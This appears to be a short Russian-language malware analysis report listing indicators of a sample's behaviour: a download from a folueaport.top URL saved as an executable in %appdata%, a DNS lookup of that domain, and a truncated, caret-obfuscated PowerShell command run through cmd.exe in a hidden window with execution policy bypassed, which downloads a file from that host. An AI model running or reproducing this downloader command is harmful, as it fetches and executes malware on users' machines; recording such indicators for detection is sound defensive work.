Техническая информация
- http://folueaport.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^Ersh^eL^l^.e^XE -E^X^eCUT^IoN^POLI^C^y ^byPASS ^-n^oprofI^Le -wI^n^dO^wS^ty^L^E^ ^hIDde^N (NeW-Ob^Jec^t ^sYS^tEm^.N^e^t.w^eb^cl^I^eNT).dOWN^lO^a^dfiL^e('http://folueaport.t...
- DNS ASK fo###aport.top
- '<SYSTEM32>\cmd.exe' /c "pOw^Ersh^eL^l^.e^XE -E^X^eCUT^IoN^POLI^C^y ^byPASS ^-n^oprofI^Le -wI^n^dO^wS^ty^L^E^ ^hIDde^N (NeW-Ob^Jec^t ^sYS^tEm^.N^e^t.w^eb^cl^I^eNT).dOWN^lO^a^dfiL^e('http://folueaport.t...' (со скрытым окном)